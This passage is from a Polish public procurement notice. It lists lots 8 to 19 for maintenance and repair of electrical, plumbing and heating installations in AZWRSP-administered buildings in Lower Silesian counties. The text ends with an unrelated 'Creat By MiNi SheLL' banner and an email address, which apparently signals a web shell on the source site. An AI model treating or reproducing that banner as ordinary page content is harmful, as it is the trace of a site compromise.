<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP we Wrocławiu, zlokalizowanych na terenie powiatu oleśnickiego zgodnie z zał. nr 7 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przedmiot 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP we Wrocławiu, zlokalizowanych na terenie powiatu milickiego i trzebnickiego zgodnie z zał. nr 8 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Przedmiot 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP we Wrocławiu, zlokalizowanych na terenie powiatu strzelińskiego zgodnie z zał. nr 9 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Przedmiot 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP we Wrocławiu, zlokalizowanych na terenie powiatu wołowskiego o zgodnie z zał. nr 10 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Przedmiot 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP we Wrocławiu, zlokalizowanych na terenie powiatu górowskiego zgodnie z zał. nr 11 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Przedmiot 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP we Wrocławiu, zlokalizowanych na terenie powiatu średzkiego zgodnie z zał. nr 12 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Przedmiot 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP we Wrocławiu, zlokalizowanych na terenie powiatu wrocławskiego i grodzkiego zgodnie z zał. nr 13 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Przedmiot 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP w Legnicy, zlokalizowanych na terenie powiatu głogowskiego zgodnie z zał. nr 14 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Przedmiot 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP w Legnicy, zlokalizowanych na terenie powiatu polkowickiego zgodnie z zał. nr 15 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Przedmiot 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP w Legnicy, zlokalizowanych na terenie powiatu lubińskiego zgodnie z zał. nr 16 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Przedmiot 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP w Legnicy, zlokalizowanych na terenie powiatu legnickiego zgodnie z zał. nr 17 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Przedmiot 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP w Legnicy, zlokalizowanych na terenie powiatu jaworskiego zgodnie z zał. nr 18 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Przedmiot 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP w Legnicy, zlokalizowanych na terenie powiatu złotoryjskiego zgodnie z zał. nr 19 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com